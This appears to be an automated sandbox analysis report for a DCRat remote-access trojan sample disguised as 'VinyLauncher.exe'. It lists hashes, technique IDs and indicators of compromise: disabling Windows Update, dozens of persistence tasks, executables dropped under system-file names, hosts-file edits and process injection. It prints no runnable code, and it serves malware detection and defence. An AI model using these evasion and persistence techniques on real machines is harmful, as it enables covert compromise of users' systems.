dcrat | b82f23ee8617e7ad47d7513fe175e7211564eed5442002927a415d7a035da5cf

Resubmissions

26-12-2022 00:04

221226-acrmcafe2y 10

26-12-2022 00:03

26-12-2022 00:03

26-12-2022 00:03

26-12-2022 00:02

26-12-2022 00:01

Analysis

max time kernel
139s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
26-12-2022 00:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

VinyLauncher.exe
Size

160KB
MD5

6260d545ece6e4f04cafc98adf93ff7b
SHA1

5f4f3a9edee92982ba2ff096827fc4da8ecc649a
SHA256

8ddb7cbefe9e072050de7fca61b3db887abfdae8bc4f06ffca6446fac3c8c10f
SHA512

c80d7b4bf465a43b1a6a1168105ad96b866943339ef109283b5105dd44681ed5799e37996ee87bbceccf0f9bf3a9627c97aa660318c1a7e493be61b5e29c722a
SSDEEP

3072:vPw/kZu7QBUiLkFcEdKS2fpp/9eLjEHj9t39cDLztUbkxl:AENBUiLkFcEcS2fppVeLjEHvNcDLzSb

Score

10^/10

dcrat evasion infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Process spawned unexpected child process 45 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4612	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1664	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1464	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4384	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1868	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3468	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3892	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2656	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2548	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4932	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4008	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1428	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3872	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5000	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5056	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3136	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4840	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4488	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4728	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4740	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2332	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	812	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4540	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1532	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3120	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4328	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3496	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4720	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2180	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5032	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4276	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3904	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3752	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3700	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3208	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5052	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2368	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1768	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2384	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3396	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1736	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1084	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4744	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3352	4640	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4436	4640	schtasks.exe

DCRat payload 7 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\checksum.exe	dcrat
C:\Users\Admin\AppData\Local\Temp\checksum.exe	dcrat
C:\hypersavesIntoRuntime\savesinto.exe	dcrat
C:\hypersavesIntoRuntime\savesinto.exe	dcrat
behavioral6/memory/2740-157-0x00000000003B0000-0x000000000056A000-memory.dmp	dcrat
C:\Recovery\WindowsRE\cmd.exe	dcrat
C:\Recovery\WindowsRE\cmd.exe	dcrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

11 4984 powershell.exe
Downloads MZ/PE file

flow	pid	process
11	4984	powershell.exe

Drops file in Drivers directory 3 IoCs

Processes:

locemsecurity.exeupdaterload.exesavesinto.exe

description	ioc	process
File created	C:\Windows\system32\drivers\etc\hosts	locemsecurity.exe
File created	C:\Windows\system32\drivers\etc\hosts	updaterload.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	savesinto.exe

Executes dropped EXE 5 IoCs

Processes:

checksum.exelocemsecurity.exesavesinto.exeupdaterload.execmd.exe

pid process

844 checksum.exe
2504 locemsecurity.exe
2740 savesinto.exe
544 updaterload.exe
3892 cmd.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
844	checksum.exe
2504	locemsecurity.exe
2740	savesinto.exe
544	updaterload.exe
3892	cmd.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

VinyLauncher.exechecksum.exeWScript.exesavesinto.execmd.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	VinyLauncher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	checksum.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	savesinto.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

updaterload.exe

description	pid	process	target process
PID 544 set thread context of 4016	544	updaterload.exe	conhost.exe
PID 544 set thread context of 2868	544	updaterload.exe	conhost.exe

Drops file in Program Files directory 19 IoCs

Processes:

savesinto.exelocemsecurity.execmd.execmd.exeupdaterload.exe

description	ioc	process
File created	C:\Program Files (x86)\Windows Portable Devices\56085415360792	savesinto.exe
File created	C:\Program Files\Windows Defender\fr-FR\6cb0b6c459d5d3	savesinto.exe
File created	C:\Program Files\Google\Chrome\updaterload.exe	locemsecurity.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files (x86)\Windows Portable Devices\wininit.exe	savesinto.exe
File opened for modification	C:\Program Files (x86)\Windows Portable Devices\wininit.exe	savesinto.exe
File created	C:\Program Files (x86)\Windows Media Player\04c1e7795967e4	savesinto.exe
File created	C:\Program Files (x86)\Common Files\Microsoft Shared\DAO\a19f341fe10fc2	savesinto.exe
File created	C:\Program Files (x86)\Windows Media Player\TrustedInstaller.exe	savesinto.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\csrss.exe	savesinto.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\conhost.exe	savesinto.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\088424020bedd6	savesinto.exe
File created	C:\Program Files (x86)\Microsoft.NET\RedistList\55b276f4edf653	savesinto.exe
File created	C:\Program Files\Windows Defender\fr-FR\dwm.exe	savesinto.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updaterload.exe
File created	C:\Program Files (x86)\Common Files\Microsoft Shared\DAO\savesinto.exe	savesinto.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\886983d96e3d3e	savesinto.exe
File created	C:\Program Files (x86)\Microsoft.NET\RedistList\StartMenuExperienceHost.exe	savesinto.exe

Drops file in Windows directory 4 IoCs

Processes:

savesinto.exe

description	ioc	process
File created	C:\Windows\SystemApps\System.exe	savesinto.exe
File created	C:\Windows\SystemApps\27d1bcfc3c54e0	savesinto.exe
File created	C:\Windows\Logs\SIH\sihost.exe	savesinto.exe
File created	C:\Windows\Logs\SIH\66fc9ff0ee96c2	savesinto.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

3792 sc.exe
4448 sc.exe
1644 sc.exe
1528 sc.exe
5072 sc.exe
1704 sc.exe
4444 sc.exe
2172 sc.exe
1592 sc.exe
2184 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
3792	sc.exe
4448	sc.exe
1644	sc.exe
1528	sc.exe
5072	sc.exe
1704	sc.exe
4444	sc.exe
2172	sc.exe
1592	sc.exe
2184	sc.exe

Creates scheduled task(s) 1 TTPs 45 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

pid	process
4932	schtasks.exe
1428	schtasks.exe
4740	schtasks.exe
1768	schtasks.exe
3496	schtasks.exe
2180	schtasks.exe
3904	schtasks.exe
3396	schtasks.exe
1464	schtasks.exe
2656	schtasks.exe
4840	schtasks.exe
4728	schtasks.exe
4436	schtasks.exe
3468	schtasks.exe
5000	schtasks.exe
3752	schtasks.exe
3700	schtasks.exe
812	schtasks.exe
1532	schtasks.exe
4276	schtasks.exe
2384	schtasks.exe
4612	schtasks.exe
4384	schtasks.exe
2548	schtasks.exe
4008	schtasks.exe
4744	schtasks.exe
4328	schtasks.exe
3208	schtasks.exe
1736	schtasks.exe
1084	schtasks.exe
1664	schtasks.exe
3892	schtasks.exe
4540	schtasks.exe
3120	schtasks.exe
3872	schtasks.exe
5052	schtasks.exe
2368	schtasks.exe
3352	schtasks.exe
1868	schtasks.exe
5056	schtasks.exe
4720	schtasks.exe
5032	schtasks.exe
3136	schtasks.exe
4488	schtasks.exe
2332	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.execonhost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe

Modifies registry class 3 IoCs

Processes:

checksum.exesavesinto.execmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings	checksum.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings	savesinto.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exesavesinto.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execmd.exe

pid	process
4984	powershell.exe
4984	powershell.exe
1932	powershell.exe
1932	powershell.exe
2740	savesinto.exe
2740	savesinto.exe
2740	savesinto.exe
2740	savesinto.exe
2740	savesinto.exe
2740	savesinto.exe
2740	savesinto.exe
2740	savesinto.exe
2740	savesinto.exe
1796	powershell.exe
1796	powershell.exe
1444	powershell.exe
1444	powershell.exe
2412	powershell.exe
4472	powershell.exe
2412	powershell.exe
4472	powershell.exe
3916	powershell.exe
3916	powershell.exe
3424	powershell.exe
3424	powershell.exe
2740	savesinto.exe
2740	savesinto.exe
2740	savesinto.exe
2396	powershell.exe
2396	powershell.exe
4360	powershell.exe
4360	powershell.exe
4084	powershell.exe
4084	powershell.exe
2268	powershell.exe
2268	powershell.exe
1640	powershell.exe
1640	powershell.exe
2884	powershell.exe
2884	powershell.exe
4288	powershell.exe
4288	powershell.exe
4472	powershell.exe
1796	powershell.exe
1796	powershell.exe
2412	powershell.exe
3916	powershell.exe
1444	powershell.exe
4360	powershell.exe
2268	powershell.exe
3424	powershell.exe
4084	powershell.exe
2884	powershell.exe
2396	powershell.exe
4288	powershell.exe
1640	powershell.exe
3528	powershell.exe
3528	powershell.exe
3528	powershell.exe
3444	powershell.exe
3444	powershell.exe
4668	powershell.exe
4668	powershell.exe
3892	cmd.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

656

pid	process
656

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

VinyLauncher.exepowershell.exepowershell.exesavesinto.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	1628	VinyLauncher.exe
Token: SeDebugPrivilege	4984	powershell.exe
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeDebugPrivilege	2740	savesinto.exe
Token: SeDebugPrivilege	1796	powershell.exe
Token: SeDebugPrivilege	1444	powershell.exe
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeDebugPrivilege	4472	powershell.exe
Token: SeDebugPrivilege	3916	powershell.exe
Token: SeDebugPrivilege	3424	powershell.exe
Token: SeDebugPrivilege	2396	powershell.exe
Token: SeDebugPrivilege	4360	powershell.exe
Token: SeDebugPrivilege	4084	powershell.exe
Token: SeDebugPrivilege	2268	powershell.exe
Token: SeDebugPrivilege	1640	powershell.exe
Token: SeDebugPrivilege	2884	powershell.exe
Token: SeDebugPrivilege	4288	powershell.exe
Token: SeDebugPrivilege	3528	powershell.exe
Token: SeDebugPrivilege	3444	powershell.exe
Token: SeShutdownPrivilege	2060	powercfg.exe
Token: SeCreatePagefilePrivilege	2060	powercfg.exe
Token: SeShutdownPrivilege	4416	powercfg.exe
Token: SeCreatePagefilePrivilege	4416	powercfg.exe
Token: SeIncreaseQuotaPrivilege	3444	powershell.exe
Token: SeSecurityPrivilege	3444	powershell.exe
Token: SeTakeOwnershipPrivilege	3444	powershell.exe
Token: SeLoadDriverPrivilege	3444	powershell.exe
Token: SeSystemProfilePrivilege	3444	powershell.exe
Token: SeSystemtimePrivilege	3444	powershell.exe
Token: SeProfSingleProcessPrivilege	3444	powershell.exe
Token: SeIncBasePriorityPrivilege	3444	powershell.exe
Token: SeCreatePagefilePrivilege	3444	powershell.exe
Token: SeBackupPrivilege	3444	powershell.exe
Token: SeRestorePrivilege	3444	powershell.exe
Token: SeShutdownPrivilege	3444	powershell.exe
Token: SeDebugPrivilege	3444	powershell.exe
Token: SeSystemEnvironmentPrivilege	3444	powershell.exe
Token: SeRemoteShutdownPrivilege	3444	powershell.exe
Token: SeUndockPrivilege	3444	powershell.exe
Token: SeManageVolumePrivilege	3444	powershell.exe
Token: 33	3444	powershell.exe
Token: 34	3444	powershell.exe
Token: 35	3444	powershell.exe
Token: 36	3444	powershell.exe
Token: SeShutdownPrivilege	4400	powercfg.exe
Token: SeCreatePagefilePrivilege	4400	powercfg.exe
Token: SeShutdownPrivilege	3112	powercfg.exe
Token: SeCreatePagefilePrivilege	3112	powercfg.exe
Token: SeIncreaseQuotaPrivilege	3444	powershell.exe
Token: SeSecurityPrivilege	3444	powershell.exe
Token: SeTakeOwnershipPrivilege	3444	powershell.exe
Token: SeLoadDriverPrivilege	3444	powershell.exe
Token: SeSystemProfilePrivilege	3444	powershell.exe
Token: SeSystemtimePrivilege	3444	powershell.exe
Token: SeProfSingleProcessPrivilege	3444	powershell.exe
Token: SeIncBasePriorityPrivilege	3444	powershell.exe
Token: SeCreatePagefilePrivilege	3444	powershell.exe
Token: SeBackupPrivilege	3444	powershell.exe
Token: SeRestorePrivilege	3444	powershell.exe
Token: SeShutdownPrivilege	3444	powershell.exe
Token: SeDebugPrivilege	3444	powershell.exe
Token: SeSystemEnvironmentPrivilege	3444	powershell.exe
Token: SeRemoteShutdownPrivilege	3444	powershell.exe
Token: SeUndockPrivilege	3444	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

VinyLauncher.exepowershell.exechecksum.exeWScript.execmd.exesavesinto.exelocemsecurity.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1628 wrote to memory of 4984	1628	VinyLauncher.exe	powershell.exe
PID 1628 wrote to memory of 4984	1628	VinyLauncher.exe	powershell.exe
PID 4984 wrote to memory of 1932	4984	powershell.exe	powershell.exe
PID 4984 wrote to memory of 1932	4984	powershell.exe	powershell.exe
PID 4984 wrote to memory of 844	4984	powershell.exe	checksum.exe
PID 4984 wrote to memory of 844	4984	powershell.exe	checksum.exe
PID 4984 wrote to memory of 844	4984	powershell.exe	checksum.exe
PID 4984 wrote to memory of 2504	4984	powershell.exe	locemsecurity.exe
PID 4984 wrote to memory of 2504	4984	powershell.exe	locemsecurity.exe
PID 844 wrote to memory of 4272	844	checksum.exe	WScript.exe
PID 844 wrote to memory of 4272	844	checksum.exe	WScript.exe
PID 844 wrote to memory of 4272	844	checksum.exe	WScript.exe
PID 4272 wrote to memory of 3816	4272	WScript.exe	cmd.exe
PID 4272 wrote to memory of 3816	4272	WScript.exe	cmd.exe
PID 4272 wrote to memory of 3816	4272	WScript.exe	cmd.exe
PID 3816 wrote to memory of 2740	3816	cmd.exe	savesinto.exe
PID 3816 wrote to memory of 2740	3816	cmd.exe	savesinto.exe
PID 2740 wrote to memory of 1796	2740	savesinto.exe	powershell.exe
PID 2740 wrote to memory of 1796	2740	savesinto.exe	powershell.exe
PID 2740 wrote to memory of 2412	2740	savesinto.exe	powershell.exe
PID 2740 wrote to memory of 2412	2740	savesinto.exe	powershell.exe
PID 2740 wrote to memory of 3916	2740	savesinto.exe	powershell.exe
PID 2740 wrote to memory of 3916	2740	savesinto.exe	powershell.exe
PID 2740 wrote to memory of 4472	2740	savesinto.exe	powershell.exe
PID 2740 wrote to memory of 4472	2740	savesinto.exe	powershell.exe
PID 2740 wrote to memory of 1444	2740	savesinto.exe	powershell.exe
PID 2740 wrote to memory of 1444	2740	savesinto.exe	powershell.exe
